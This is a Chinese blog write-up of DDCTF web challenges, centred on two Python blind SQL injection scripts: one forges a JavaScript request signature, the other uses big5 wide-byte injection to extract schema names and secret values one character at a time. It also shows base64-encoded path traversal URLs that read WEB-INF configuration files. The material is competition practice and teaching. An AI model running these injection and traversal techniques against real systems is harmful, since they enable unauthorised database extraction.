[DDctf](web)两道sql注入write up

ctf是不可能的，这辈子都不可能的，只能写写签到这个样子

数据库的秘密

查看源代码js


function signGenerate(obj, key) {
  var str0 = '';
  for (i in obj) {
    if (i != 'sign') {
      str1 = '';
      str1 = i + '=' + obj[i];
      str0 += str1
    }
  }
  return hex_math_enc(str0 + key)
};
var obj = {
  id: '',
  title: '',
  author: '',
  date: '',
  time: parseInt(new Date().getTime() / 1000)
};

function submitt() {
  obj['id'] = document.getElementById('id').value;
  obj['title'] = document.getElementById('title').value;
  obj['author'] = document.getElementById('author').value;
  obj['date'] = document.getElementById('date').value;
  var sign = signGenerate(obj, key);
  document.getElementById('queryForm').action = "index.php?sig=" + sign + "&time=" + obj.time;
  document.getElementById('queryForm').submit()
}

key = 'adrefkfweodfsdpiru'

发现有js加密，还有一个hidden参数，其他两个字符类型的参数都有防火墙，所以我们要从author参数注入，进行盲注

过滤了database()

手残党，js加密翻译到python翻不来，直接调用js的函数好了，具体操作查看execjs库的使用方法

# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import execjs
import time
import urllib


def get_js():
  f = open("./math.js", 'r')
  line = f.readline()
  htmlstr = ''
  while line:
    htmlstr = htmlstr + line
    line  = f.readline()
  return htmlstr

def js_encode(payload, time_str):
  jsstr = get_js()
  ctx =  execjs.compile(jsstr)
  key = 'adrefkfweodfsdpiru'
  return(ctx.call('hex_math_enc','id=title=author='+payload+'date=time='+time_str+key))




def access(payload):
  url = "http://116.85.43.88:8080/EHZTYREPPGMCQLNB/dfe3ia/index.php?"
  urllib.unquote(payload)

  data = {
    "id": "",
    "title": "",
    "date": "",
    "author":"admin'&&"+(payload)+"#",
    "button":"search",
  }

  time_str = str(int(time.time()))
  sign = js_encode(data['author'], time_str)

  proxies = {'http': "http://127.0.0.1:8080"}
  headers = {
      "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
      "Content-Type": "application/x-www-form-urlencoded",
      "X-Forwarded-For": "123.232.23.245"
  }

  final_url = url + 'sig=' + sign + '&time=' + time_str

  response = requests.post(final_url, data=data, headers=headers, proxies=proxies)
  text = response.text

  if 'admin' in  text :
    return 1
  else:
    return 0

def get_payload(i,w):
  #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
  #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

  #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ddctf')fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

  #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6374665f6b657937)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'


  payload = "((ord(substr((select group_concat(secvalue) from ctf_key7)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

  return payload


if __name__ == '__main__':
  dic = list("0qwertyuiopasdf{}ghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUVWXYZ=#$%^&*()-+!`")
  pw = ''

  for i in range(1, 40):
      for w in dic:
          if access(urllib.unquote(get_payload(i, w))):
              num = ord(w)
              w =  chr(num)
              pw += w
              print pw
              break

数据库名:ddctf
表名：ctf_key7,message
列名:secvalue
flag:DDCTF{JQDCSEMLJCCPJRMO}

专属链接

下载WEB-INF/web.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi93ZWIueG1s
mvc-dispatcher-servlet.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi9tdmMtZGlzcGF0Y2hlci1zZXJ2bGV0LnhtbA==

<property name="resourceLoaderPath" value="/WEB-INF/pages/"/>

靠太菜了...日不动

注入的奥妙

在页面源码发现是个big5编码提示宽字节注入，宽字节的要点就是把单引号前面的转义斜杠吞掉或者添加一个转义斜杠转义掉。

所以直接日吧，fuzz

http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%Bb%a0'||%23

%E9%B1%8b'||1%23

%E9%B1%ad'||1%23

image

开始盲注，脚本如下

过滤了dataabse(),还有大于小于号

# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import time
import urllib




def access(payload):
    url = "http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%B1%ad'||("

    proxies = {'http': "http://127.0.0.1:8080"}
    headers = {
      "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
      "Content-Type": "application/x-www-form-urlencoded",
    }

    full_url = url +payload+ ")%23"

    response =  requests.get(full_url,headers=headers,proxies=proxies)

    text = response.text

    if "test" in text :
        return 1

    else: 

        return 0


def get_payload(i,w):
  #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
  #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'# slqi

  #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' # message,route_rules,6d657373616765  726f7574655f72756c6573

  #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6d657373616765)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' #id,pattern,action,rulepass  


  payload = "((ord(substr((select group_concat(action) from route_rules)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'

  return payload



if __name__ == '__main__':
  dic = list("0qwertyuiopasdfghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUV{}WXYZ=#$%^&*()-+!`")
  pw = ''

  for i in range(30, 100):
      for w in dic:
          if access(urllib.unquote(get_payload(i, w))):
              num = ord(w)
              w =  chr(num)
              pw += w
              print pw
              break

数据库里没找到flag，有个route表，估计又是找路径的什么鬼，无聊太菜了，不想日了

想起来写过某个针对这种盲注的菜鸡脚本，稍微改改就能用了

image.png

github地址，比较粗糙，求大佬轻喷：https://github.com/deenrookie/fff-sqli

最后编辑于：2018.04.20 21:27:30

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 157,012评论 4赞 359
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 66,589评论 1赞 290
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 106,819评论 0赞 237
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 43,652评论 0赞 202
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 51,954评论 3赞 285
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 40,381评论 1赞 210
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 31,687评论 2赞 310
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 30,404评论 0赞 194
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 34,082评论 1赞 238
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 30,355评论 2赞 241
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 31,880评论 1赞 255
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 28,249评论 2赞 250
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 32,864评论 3赞 232
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 26,007评论 0赞 8
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 26,760评论 0赞 192
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 35,394评论 2赞 269
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 35,281评论 2赞 259

[DDctf](web)两道sql注入write up

数据库的秘密

专属链接

注入的奥妙

推荐阅读更多精彩内容